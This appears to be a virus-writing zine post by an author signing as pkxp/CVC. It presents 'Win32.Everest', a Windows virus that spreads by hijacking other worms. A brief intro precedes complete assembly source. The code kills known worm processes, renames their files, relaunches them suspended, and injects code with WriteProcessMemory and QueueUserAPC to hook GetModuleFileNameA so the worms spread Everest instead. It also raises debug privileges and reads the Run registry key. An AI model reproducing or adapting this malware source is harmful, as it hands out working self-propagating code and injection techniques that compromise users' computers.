文章作者:pkxp
信息来源:
www.retcvc.com
Win32.Everest
by pkxp/CVC
lemme introduce my Everest virus, the worlds first virus
which spreads via other viruses. The idea came to my head when
I was thinking about viruses in 2003. The virus itself is not
big,and it's not complicated, I code it just to show something new.
Technical details:
1. find a known virus
2. kill and move it
3. run it in suspend mode and hook it's GetModuleNameFileA
4. resume it
5. if no more known viruses ,continue, else jump 1
6. read data from HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
7. repeat 1,2,3,4,5
8. sleep , then jump 1
So when thonse viruses spread,what they are spreading is my Everest instead!
pkxp / CVC
.386
.model flat,stdcall
option casemap:none
include useful.inc
.code
main:
@pushsz 'Everest'
push FALSE
push NULL
call CreateMutex
call GetLastError
cmp eax , ERROR_ALREADY_EXISTS
jz ExitVirus
call EverestInit
PatchFixedVirus:
mov pMem , NULL
@pushsz '\'
push offset szWinPath
push offset FixedVirus
call PatchAllVirus
push 1000*60*30
call Sleep
PatchRegRunVirus:
Invoke VirtualAlloc,0,4096,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE
or eax , eax
jz MainSleep
mov pMem , eax
call ReadRunKey ;read data from run to pMem
push NULL
push NULL
push pMem
call PatchAllVirus ;no prefix
push MEM_RELEASE
push 0
push pMem
call VirtualFree
MainSleep:
push 1000*60*15
call Sleep
jmp PatchFixedVirus
ExitVirus:
push 1
call ExitProcess
;--------------------------------------------------------------
EverestInit:
push MAX_PATH
push offset szWormPath
push 0
call GetModuleFileNameA
push 50
push offset szWinPath
call GetWindowsDirectoryA
push 50
push offset szSysPath
call GetSystemDirectoryA
call RaisePrivileges
call GetAPIz
ret
;---------------------------------------------------------------
PatchAllVirus PROC szVirusList : DWORD , szPrefix : DWORD , szPrefix2 : DWORD
LOCAL hProcess : DWORD
LOCAL szVirusPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
mov esi , szVirusList
lea edi , szVirusPath
PAVLoop:
push esi
push szPrefix2
push szPrefix
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
mov al , byte ptr[edi]
or al , al
jz PAVExit
lea eax , szformatedPath
push eax
push edi
call formatVirus
lea eax , szformatedPath
push eax
call OpenNT4_2k_xp_2003Virus
mov hProcess , eax
PAVNextName:
lodsb
or al , al
jnz PAVNextName
mov eax , pMem
.if eax == 0
lodsd
.else
mov eax , offset PatchVirus
.endif
push edi
push hProcess
call eax
mov al , byte ptr[esi]
or al , al
jnz PAVLoop
PAVExit:
ret 12
PatchAllVirus ENDP
;------------------------------------------------------------------
formatVirus PROC pVirusName:DWORD , pformatedName:DWORD
pushad
mov esi , pVirusName
mov edi , pformatedName
FVCopy:
lodsb
cmp al , ' '
jz FVEndCopy
or al , al
jz FVEndCopy
stosb
jmp FVCopy
FVEndCopy:
xor al , al
stosb
popad
ret 8
formatVirus ENDP
;------------------------------------------------------------------
FixedVirus:
db 'system32\msblast.exe',0 ;msblast
dd offset PatchVirus
db 'Videodrv.exe',0 ;Mimail
dd offset PatchVirus
db 'system32\runouce.exe',0 ;ChineseHack
dd offset PatchVirus
db 'system32\gone.scr',0
dd offset PatchVirus
db 'system32\hfind.exe',0 ;muma
dd offset PatchVirus
db 'system32\scam32.exe',0 ;sircam
dd offset PatchVirus
db 'killonce.exe',0
dd offset PatchVirus
db 'system32\wins\DLLHOST.exe',0
dd offset PatchVirus
db 'system32\Ravmond.exe',0 ;Lovgate
dd offset PatchVirus
db 'system32\WinGate.exe',0
dd offset PatchVirus
db 'system32\WinDriver.exe',0
dd offset PatchVirus
db 'system32\Winrpc.exe',0
dd offset PatchVirus
db 'system32\Winhelp.exe',0
dd offset PatchVirus
db 'system32\Iexplore.exe',0
dd offset PatchVirus
db 'system32\NetServices.exe',0
dd offset PatchVirus
db 'system32\winexe.exe',0
dd offset PatchVirus
db 'mmc.exe',0 ;nimda
dd offset PatchVirus
db 'system32\load.exe',0
dd offset PatchVirus
db 'system32\wqk.exe',0 ;Klez
dd offset PatchVirus
db 'system32\krn132.exe',0
dd offset PatchVirus
db 'ParticularViruses',0
dd offset ParticularVirus
db 0 ;End of virus list
;-------------------------------------------------------------------
OpenNT4_2k_xp_2003Virus PROC szVirusName : DWORD
LOCAL hProcess : DWORD
LOCAL hMods : DWORD
LOCAL szProcessName[MAX_PATH] : BYTE
LOCAL ProcessIds[128+1] : DWORD
pushad
push szVirusName
push offset szWormPath
call lstrcmpi
jz OVFailExit
lea esi , ProcessIds
push (128+1)*4
push esi
call RtlZeroMemory
push offset tmp
push 128*4 ;*4
push esi
moveax,12345678h
_EnumProcesses = dword ptr $-4
call eax ;enumerate all running processes
dec eax
jne OVFailExit
add esi,4 ;esi->ProcessIDs[128]
ProcessSearch:
lodsd ;get PID
or eax , eax
jz OVFailExit
push eax
push FALSE
push PROCESS_ALL_ACCESS
call OpenProcess
or eax , eax
jz ProcessSearch
mov hProcess , eax
lea eax , hMods
push offset tmp
push 4
push eax
push hProcess
mov eax , 12345678h
_EnumProcessModules = dword ptr $-4
call eax
or eax , eax
jz OVClose
lea edi , szProcessName
push MAX_PATH
push edi
push hMods
push hProcess
mov eax , 12345678h
_GetModuleFileNameEx = dword ptr $-4
call eax
or eax , eax
jz OVClose
IsVirus:
push szVirusName
push edi
call lstrcmpi
jz OVSucExit
OVClose:
push hProcess
call CloseHandle
jmp ProcessSearch
OVFailExit:
popad
xor eax , eax
ret 4
OVSucExit:
popad
mov eax , hProcess
ret 4
OpenNT4_2k_xp_2003Virus ENDP
;---------------------------------------------------------------
PatchVirus PROC hProcess : DWORD , szVirusPath : DWORD
LOCAL szDestPath[128] : BYTE
LOCAL szformatedPath[128]: BYTE
pushad
mov eax , hProcess
or eax , eax
jz PVMoveVirus
push 0
push hProcess
call TerminateProcess
push INFINITE
push hProcess
call WaitForSingleObject
push hProcess
call CloseHandle
PVMoveVirus:
lea esi , szformatedPath
push esi
push szVirusPath
call formatVirus
lea edi , szDestPath
push esi
push edi
call lstrcpy
@pushsz '.scr'
push edi
call lstrcat
push edi
push esi
call MoveFile
push esi
call lstrlen
mov esi , szVirusPath
add esi , eax
push esi
push edi
call lstrcat
push edi
call StartVirus
popad
ret 8
PatchVirus ENDP
;-------------------------------------------------------------------
ParticularVirus:
ret 8
;-------------------------------------------------------------------
StartVirus PROC szVirusPath : DWORD
LOCAL sio : STARTUPINFO
LOCAL pi : PROCESS_INformATION
LOCAL cbWritten : DWORD
pushad
push sizeof(STARTUPINFO)
lea eax , sio
push eax
call RtlZeroMemory
mov sio.cb , sizeof STARTUPINFO
mov sio.wShowWindow , SW_HIDE
mov sio.dwFlags , STARTF_USESHOWWINDOW
lea eax , pi
push eax
lea eax , sio
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push TRUE
push NULL
push NULL
push szVirusPath
push NULL
call CreateProcess
or eax , eax
jzSVExit
push 3000
call Sleep
pushPAGE_EXECUTE_READWRITE
pushMEM_RESERVE or MEM_COMMIT
pushRemoteCodeEnd - RemoteCodeStart
push0
push pi.hProcess
call VirtualAllocEx
or eax , eax
jzSVFail
mov esi , eax
add eax , NewGetModuleFileName - RemoteCodeStart
mov _NewGetModuleFileNameA , eax
lea eax , cbWritten
push eax
push RemoteCodeEnd - RemoteCodeStart
push offset RemoteCodeStart
push esi
push pi.hProcess
call WriteProcessMemory
or eax , eax
jzSVFail
push NULL
push pi.hThread
push esi
call QueueUserAPC
or eax , eax
jzSVFail
push pi.hThread
call ResumeThread
SVFail:
push pi.hThread
call CloseHandle
push pi.hProcess
call CloseHandle
SVExit:
popad
ret 4
StartVirus ENDP
;-----------------------------------------------------------------
RemoteCodeStart:
mov esi , 12345678h
_GetModuleFileNameA = dword ptr $-4
@pushsz '123' ;cbWriten
push PAGE_EXECUTE_READWRITE
push 6 ; push & ret
push esi
mov eax , 12345678h
_VirtualProtect = dword ptr $-4
call eax
@pushsz '123' ;cbWriten
push 6
call RCSJump
push 12345678h
_NewGetModuleFileNameA = dword ptr $-4
ret
RCSJump:
push esi
push -1
mov eax , 12345678h
_WriteProcessMemory = dword ptr $-4
call eax
ret 4
NewGetModuleFileName:
push esi
push edi
mov edi , [esp+16]
call _szWormPath
szWormPath db MAX_PATH dup (0)
_szWormPath:
pop esi
xor ecx , ecx
RCSLoop:
lodsb
stosb
inc ecx
or al , al
jnz RCSLoop
pop edi
pop esi
mov eax , ecx
dec eax
ret 12
RemoteCodeEnd:
;-----------------------------------------------------------------
GetAPIz:
@pushsz 'Kernel32.dll'
call GetModuleHandle
xchg eax,esi
@pushsz 'GetModuleFileNameA'
push esi
call GetProcAddress
mov _GetModuleFileNameA,eax
@pushsz 'VirtualProtect'
push esi
call GetProcAddress
mov _VirtualProtect,eax
@pushsz 'WriteProcessMemory'
push esi
call GetProcAddress
mov _WriteProcessMemory,eax
@pushsz 'PSAPI'
call LoadLibraryA
xchg eax,esi
@pushsz 'EnumProcesses'
push esi
call GetProcAddress
mov _EnumProcesses,eax
@pushsz 'EnumProcessModules'
push esi
call GetProcAddress
mov _EnumProcessModules,eax
@pushsz 'GetModuleFileNameExA'
push esi
call GetProcAddress
mov _GetModuleFileNameEx,eax
ret
;---------------Raise Privilege of our process----------------------
RaisePrivileges:
call GetCurrentProcess
push offset p_token
push TOKEN_ALL_ACCESS ;DesiredAccess
push eax
call OpenProcessToken ;open token of our process
or eax,eax ;God,I used cmp eax,eax first
jz RPExit
push offset p_luid
@pushsz 'SeDebugPrivilege'
push NULL
call LookupPrivilegevalueA ;find LUID for this priv.
dec eax
jne RPExit
push 0
call SetLastError
push NULL
push NULL
push NULL
push offset token_priv
push FALSE
push p_token
call AdjustTokenPrivileges
RPExit:
ret
token_priv dd 1
p_luid db 8 dup(0)
dd SE_PRIVILEGE_ENABLED
p_token dd 0
;-------------------------------------------------------------------
ReadRunKey PROC
LOCAL hKey : DWORD
LOCAL dwIndex : DWORD
LOCAL szFilePath[MAX_PATH] : BYTE
LOCAL szvalueName[MAX_PATH] : BYTE
LOCAL dwvalueLen : DWORD
LOCAL dwDataLen : DWORD
LOCAL dwType : DWORD
pushad
lea eax , hKey
push eax
push KEY_QUERY_value ;KEY_ALL_ACCESS
push 0
@pushsz 'Software\Microsoft\Windows\CurrentVersion\Run'
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
cmp eax , ERROR_SUCCESS
jnz RRKExit
push 0
pop dwIndex
push pMem
pop edi
RRKLoop:
push MAX_PATH
pop dwDataLen
push MAX_PATH
pop dwvalueLen
lea eax , dwDataLen
push eax
lea esi , szFilePath
push esi
lea eax , dwType
push eax
push NULL
lea eax , dwvalueLen
push eax
lea eax , szvalueName
push eax
push dwIndex
push hKey
call RegEnumvalue
cmp eax , ERROR_SUCCESS
jnz RRKClose
push edi
mov edi , esi
push edi
call lstrlen
mov ecx , eax
mov al , '\'
repnz scasb
pop edi
jz RRRKReplace
push esi
@pushsz '\'
push offset szWinPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
push edi
call lstrlen
add edi , eax
xor al , al
stosb
push esi
@pushsz '\'
push offset szSysPath
@pushsz '%s%s%s'
push edi
call wsprintf
add esp , 20
jmp RRKNext
RRRKReplace:
push esi
call ReplaceFilePath
push esi
push edi
call lstrcpy
RRKNext:
push edi
call lstrlen
add edi , eax
xor al , al
stosb
inc dwIndex
jmp RRKLoop
RRKClose:
push hKey
call RegCloseKey
RRKExit:
xor al , al
stosb
popad
ret
ReadRunKey ENDP
;------------------------------------------------------------------
ReplaceFilePath PROC szFilePath : DWORD
LOCAL s[MAX_PATH] : BYTE
pushad
push szFilePath
lea edi , s
push edi
call lstrcpy
IsSysDir:
push 8
pop ecx
@pushsz '%system%' ;len=8
pop esi
repz cmpsb
jne IsWinDir
push offset szSysPath
push szFilePath
call lstrcpy
jmp RFPCat
IsWinDir:
push 8
pop ecx
@pushsz '%windir%' ;len=8
pop esi
lea edi , s
repz cmpsb
jne RFPExit
push offset szWinPath
push szFilePath
call lstrcpy
RFPCat:
push edi
push szFilePath
call lstrcat
RFPExit:
popad
ret 4
ReplaceFilePath ENDP
Signature db 'Win32.Everest by PKXP/CVC, made in China.',0
szWinPath db 50 dup (0)
szSysPath db 50 dup (0)
tmp dd ?
pMem dd 0
VEnd:
end main
